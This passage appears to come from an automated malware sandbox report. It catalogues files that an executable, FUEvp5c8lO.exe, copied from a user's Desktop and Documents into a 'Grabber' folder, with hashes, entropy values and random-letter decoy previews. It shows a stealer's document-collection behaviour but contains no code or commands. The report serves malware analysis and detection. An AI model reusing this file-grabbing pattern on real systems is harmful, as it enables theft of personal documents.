Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZSSZYEFYMU.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZSSZYEFYMU.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\AFWAAFRXKO.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\AFWAAFRXKO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\AIXACVYBSB.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
